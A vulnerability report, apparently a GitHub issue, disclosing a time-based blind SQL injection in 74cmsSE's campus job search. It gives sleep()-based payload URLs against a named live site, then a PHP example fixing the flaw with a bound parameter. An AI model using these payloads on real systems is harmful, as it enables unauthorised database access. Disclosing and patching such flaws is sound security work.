CVE-2022-33097: SQL Injection vulnerability · Issue #7 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a SQL injection vulnerability via the keyword parameter at /home/campus/campus_job.
Exploit Title: SQL Injection vulnerability on 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version: 74cmsSE_v3.4.1
Download link: http://www.74cms.com/downloadse/show/id/62.html
Vulnerability Description:
74cmsSE_v3.4.1 has a time-based blind SQL injection that allows an attacker to run malicious SQL statements against the database, which can be exploited to execute illegal SQL commands and obtain sensitive database data.
POC:
Payload:
/v1_0/home/campus/campus_job?keyword=/%27%2B(select(sleep(2)))%2B%27%25/
In the path
/v1_0/home/campus/campus_job
the $keyword parameter is not strictly filtered, resulting in SQL injection.
exp1:
http://www.jllxg.com/v1_0/home/campus/campus_job?keyword=/*%27%2B(select(sleep(2)))%2B%27%25*/
As you can see from the figure above, the sleep() function is executed, so there is a time-based blind SQL injection.
With the payload above, the sleep() function may be executed 4 times.
Time-based blind injection can be used to determine the length of the database name:
exp2:
http://www.jllxg.com/v1_0/home/campus/campus_job?keyword=/*%27%2B(select(sleep(length(database()))))%2B%27%*/
As shown in the following figure, the database name of the website is already known through the arbitrary file read vulnerability to be "hsjp", and the delay is exactly 4 times length(database()), so the injection is successful.
It’s a time-based SQL injection.
Suggested fix: add a filtering function for this parameter.
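The robust form of the suggested filter is to stop building the query by string concatenation and bind the keyword as a parameter instead, so it can only ever be treated as data. The following is an added example written for this issue; it is not 74cmsSE code, and the table name campus_job, the column title and the PDO connection are assumptions. The vulnerable function is kept only for contrast and is never executed in the demo.

```php
<?php
// Added example, not 74cmsSE project code. Table/column names are hypothetical.
declare(strict_types=1);

// Bug class reported in this issue: the raw keyword is spliced into the SQL text,
// so a value like  ' + (select(sleep(2))) + '%  becomes part of the statement.
function search_jobs_vulnerable(PDO $pdo, string $keyword): array
{
    $sql = "SELECT id, title FROM campus_job WHERE title LIKE '%" . $keyword . "%'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: length cap, LIKE-wildcard escaping, and a bound parameter.
// Nothing the client sends can change the structure of the statement.
function search_jobs_safe(PDO $pdo, string $keyword): array
{
    // Bound the length so an oversized keyword cannot be used to stress the query.
    $kw = mb_substr($keyword, 0, 100);
    // Escape LIKE metacharacters with '!' so a user-supplied % or _ cannot widen the match.
    $kw = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $kw);

    $stmt = $pdo->prepare(
        "SELECT id, title FROM campus_job WHERE title LIKE :kw ESCAPE '!' LIMIT 50"
    );
    $stmt->bindValue(':kw', '%' . $kw . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone demo on an in-memory SQLite database (constructed sample data).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE campus_job (id INTEGER PRIMARY KEY, title TEXT)");
$pdo->exec("INSERT INTO campus_job (title) VALUES ('Java engineer'), ('Campus recruiter')");

// The reporter's keyword value, URL-decoded.
$payload = "' + (select(sleep(2))) + '%";

print_r(search_jobs_safe($pdo, 'java'));     // one row: 'Java engineer'
print_r(search_jobs_safe($pdo, $payload));   // empty array: the payload is matched as literal text
```

With the bound parameter the payload is simply a search string that matches no title; no function in it is ever evaluated by the database. On MySQL, set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared server-side rather than quoted client-side; both modes keep the keyword out of the SQL text, but server-side preparation also avoids any reliance on the client's quoting rules.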